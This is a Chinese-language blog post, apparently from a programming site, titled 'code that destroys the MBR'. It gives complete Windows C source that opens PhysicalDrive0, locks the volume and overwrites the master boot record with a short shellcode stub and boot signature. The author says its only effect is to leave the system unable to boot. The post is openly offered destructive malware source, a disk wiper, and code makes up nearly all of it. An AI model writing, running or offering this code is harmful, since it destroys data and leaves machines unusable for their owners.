破坏MBR的代码

最新推荐文章于 2024-08-13 17:38:49 发布

郁闷的坦然

最新推荐文章于 2024-08-13 17:38:49 发布

阅读量2.2k

点赞数 2

分类专栏：驱动

驱动专栏收录该内容

26 篇文章 1 订阅

订阅专栏

破坏MBR的代码，只有破坏作用，使系统无法进入。。。

来源于网上。。

#include <Windows.h>
#include <stdio.h>

//shellcode随便写了点 能破坏MBR,无法进入系统
unsigned char	scode[]=
	"\xb8\x12\x00"
	"\xcd\x10\xbd"
	"\x18\x7c\xb9";

DWORD writeMBR()
{
	DWORD dwBytesReturned;
	BYTE pMBR[512]={0};

	//将破坏代码写入变量pMBR
	memcpy(pMBR, scode, sizeof(scode));
	pMBR[510]=0x55;
	pMBR[511]=0xaa;

	//打开物理磁盘
	HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
	if (hDevice == INVALID_HANDLE_VALUE)
	{
		printf("createfile failed...");
		return -1;
	}

	//锁定卷，使用FSCTL_LOCK_VOLUME时，以下有几个参数设为NULL,0;
	/*Parameters
	hDevice
	A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function. 

	dwIoControlCode
	The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation. 

	lpInBuffer
	Not used with this operation; set to NULL.

	nInBufferSize
	Not used with this operation; set to zero.

	lpOutBuffer
	Not used with this operation; set to NULL.

	nOutBufferSize
	Not used with this operation; set to zero.

	lpBytesReturned
	A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */


	DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
	//写入磁盘文件 
	WriteFile(hDevice, pMBR, 512, &dwBytesReturned, NULL);
	DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL);
	return 0;
}

int main(int argc, char* argv[])
{
	writeMBR();
	return 0;
}